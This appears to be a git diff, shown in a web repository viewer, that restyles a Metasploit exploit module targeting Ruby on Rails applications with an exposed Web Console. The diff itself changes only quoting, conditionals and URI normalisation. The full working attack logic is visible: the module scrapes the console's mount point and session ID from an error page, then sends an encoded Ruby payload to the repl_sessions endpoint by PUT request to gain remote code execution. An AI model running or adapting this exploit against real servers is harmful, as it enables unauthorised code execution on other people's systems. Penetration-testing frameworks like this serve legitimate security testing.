commit
c15403a426
|
@ -28,45 +28,43 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_RUBY,
|
||||
'Privileged' => false,
|
||||
'Targets' => [ ['Automatic', {} ] ],
|
||||
'DefaultOptions' => { "PrependFork" => true },
|
||||
'DefaultOptions' => { 'PrependFork' => true },
|
||||
'DisclosureDate' => 'May 2 2016',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3000),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"])
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Identify the web console path and session ID, then inject code with it
|
||||
#
|
||||
def exploit
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
|
||||
if ! res
|
||||
unless res
|
||||
print_error("Error: No response requesting #{datastore['TARGETURI']}")
|
||||
return
|
||||
end
|
||||
|
||||
if res.body.to_s !~ /data-mount-point='([^']+)'/
|
||||
if res.body.to_s.index("Application Trace") && res.body.to_s.index("Toggle session dump")
|
||||
print_error("Error: The web console is either disabled or you are not in the whitelisted scope")
|
||||
unless res.body.to_s =~ /data-mount-point='([^']+)'/
|
||||
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
|
||||
print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
|
||||
else
|
||||
print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
console_path = $1 + "/repl_sessions"
|
||||
console_path = normalize_uri($1, 'repl_sessions')
|
||||
|
||||
if res.body.to_s !~ /data-session-id='([^']+)'/
|
||||
unless res.body.to_s =~ /data-session-id='([^']+)'/
|
||||
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
|
||||
return
|
||||
end
|
||||
|
@ -75,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
print_status("Sending payload to #{console_path}/#{session_id}")
|
||||
res = send_request_cgi({
|
||||
'uri' => console_path + "/" + session_id,
|
||||
'uri' => normalize_uri(console_path, session_id),
|
||||
'method' => 'PUT',
|
||||
'headers' => {
|
||||
'Accept' => 'application/vnd.web-console.v2',
|
||||
|
@ -84,9 +82,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'vars_post' => {
|
||||
'input' => payload.encoded
|
||||
}
|
||||
|
||||
}, 25)
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue